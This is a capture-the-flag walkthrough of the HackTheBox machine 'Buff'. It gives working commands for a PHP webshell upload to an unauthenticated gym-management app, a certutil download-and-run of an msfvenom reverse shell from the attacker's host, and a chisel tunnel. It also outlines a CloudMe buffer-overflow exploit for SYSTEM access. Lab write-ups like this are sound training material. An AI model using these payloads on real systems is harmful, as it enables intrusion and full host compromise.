Buff
Gym Management Software 1.0 on port 8080 accepted unauthenticated PHP file uploads disguised as images, giving remote code execution as buff\shaun and the user flag.
Overview
Buff is an easy-difficulty Windows box running a vulnerable PHP gym management application on port 8080. Uploading a PHP webshell disguised as a PNG image through an unauthenticated endpoint (EDB-48506) yields a shell as buff\shaun and the user flag. Privilege escalation targets CloudMe Sync 1.11.2 listening exclusively on localhost port 8888 — chisel tunnels the port to Kali, and a stack buffer overflow (CVE-2018-6892) in the application delivers a SYSTEM shell.
Machine Matrix
Real-Life and CVE dominate: unauthenticated file upload to RCE is a genuine production risk, and the privesc path is a named, weaponized stack overflow against an unpatched desktop application.
Recon
| Port | Service | Notes |
|---|---|---|
| 7680 | WUDO | Windows Update Delivery Optimization — not useful |
| 8080 | HTTP | Gym Management Software 1.0 (PHP/Apache) |
1
2
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.X
nmap -p7680,8080 -sC -sV -Pn 10.10.10.X
Only port 8080 is interesting — it serves a PHP gym management application that immediately fingerprints itself as “Gym Management Software 1.0” in the page footer, which maps directly to EDB-48506.
Enumeration
Browsing to port 8080 reveals the application name and version in the page source. A quick search for “Gym Management Software 1.0 exploit” surfaces EDB-48506: an unauthenticated unrestricted file upload vulnerability where the upload endpoint at /upload.php accepts any file so long as the client-supplied MIME type is image/png. The saved filename is controlled by the id GET parameter, so sending ?id=shell with a file named shell.php.png causes the server to store the payload as upload/shell.php.
1
curl -s http://10.10.10.X:8080/ | grep -i "gym\|version\|software"
No authentication is required to reach /upload.php — CWE-306 — making this a direct path to unauthenticated RCE.
Foothold
Write the PHP webshell payload disguised as a PNG:
1
echo '<?php echo shell_exec($_GET["cmd"]); ?>' > /tmp/shell.php.png
Upload the webshell through the unauthenticated endpoint:
1
2
3
curl -s -X POST "http://10.10.10.X:8080/upload.php?id=shell" \
-F "file=@/tmp/shell.php.png;type=image/png" \
-F "pupload=upload"
Verify RCE via the stored webshell:
1
curl -sG "http://10.10.10.X:8080/upload/shell.php" --data-urlencode "cmd=whoami"
Expected output: buff\shaun. Now upgrade to a stable reverse shell — generate a Windows reverse shell binary:
1
msfvenom -p windows/shell_reverse_tcp LHOST=<lhost> LPORT=4444 -f exe -o /tmp/shell.exe
Serve the binary from Kali:
1
python3 -m http.server 80
Start a listener on Kali:
1
nc -lvnp 4444
Download and execute the reverse shell via the webshell:
1
2
curl -sG "http://10.10.10.X:8080/upload/shell.php" \
--data-urlencode "cmd=certutil -urlcache -split -f http://<lhost>/shell.exe C:\\Users\\Public\\shell.exe && C:\\Users\\Public\\shell.exe"
A shell as buff\shaun connects back to the listener.
User flag
1
type C:\Users\shaun\Desktop\user.txt # HTB{...}
Landed directly as buff\shaun — no lateral movement required — and the user flag is ours.
Privilege Escalation
Enumerate localhost-bound services from the shaun shell:
1
netstat -ano | findstr "LISTENING"
Port 8888 is bound to 127.0.0.1 only. Confirm the application:
1
dir "C:\Users\shaun\Downloads\CloudMe_1112.exe"
CloudMe Sync 1.11.2 is installed and running. This version is vulnerable to CVE-2018-6892, a stack buffer overflow caused by copying incoming socket data into a fixed 1052-byte stack buffer without bounds checking. Because CloudMe only listens on localhost, we tunnel the port to Kali using chisel.
Serve chisel from Kali:
1
python3 -m http.server 80
Download chisel onto the target:
1
certutil -urlcache -split -f http://<lhost>/chisel.exe C:\Users\Public\chisel.exe
Start the chisel reverse server on Kali:
1
chisel server -p 9998 --reverse
Connect from the target — forwards target’s 127.0.0.1:8888 to Kali’s 127.0.0.1:8888:
1
C:\Users\Public\chisel.exe client <lhost>:9998 R:8888:127.0.0.1:8888
Generate shellcode for the exploit (bad chars \x00\x0A\x0D excluded):
1
2
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=<lhost> LPORT=9001 EXITFUNC=thread \
-b "\x00\x0A\x0D" -f python -v payload -o /tmp/cloudme_payload.py
Build the exploit script incorporating the generated payload. The structure is: 1052 bytes of padding, then the EIP overwrite with a PUSH ESP / RET gadget (\xB5\x42\xA8\x68), a NOP sled, and the shellcode — delivered over the tunneled port.
Start the listener on Kali:
1
nc -lvnp 9001
Fire the exploit against the tunneled CloudMe instance:
1
python3 /tmp/cloudme_root.py
A SYSTEM shell connects back.
Root flag
1
type C:\Users\Administrator\Desktop\root.txt # HTB{...}
Full SYSTEM access achieved via CVE-2018-6892 — Buff is fully compromised.